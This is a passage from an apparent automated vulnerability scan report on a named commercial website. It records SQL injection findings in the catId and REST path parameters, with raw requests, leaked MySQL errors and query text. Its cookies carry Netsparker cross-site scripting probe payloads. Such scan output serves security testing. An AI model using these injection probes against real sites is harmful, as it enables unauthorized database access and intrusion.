OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:27:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rtotpo9s2as53veilmuol3t6u0; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00''/project_dynamic_page_updated.php was not found on this server.</p>

1.154. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php'?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:28:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r1i9b85m7cbndtg5m9i2e659n1; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/caad00/project_dynamic_page_updated.php'?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php'?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00' at line 5

Request 2

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php''?catId=30011&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:28:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fhp1ugq0rfvkvba9h8orbf7pb1; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.155. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011'&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kfkf91cogaha2unbts5i4opud0; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/caad00/project_dynamic_page_updated.php?catId=30011'&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011'&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011''&group=caad00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 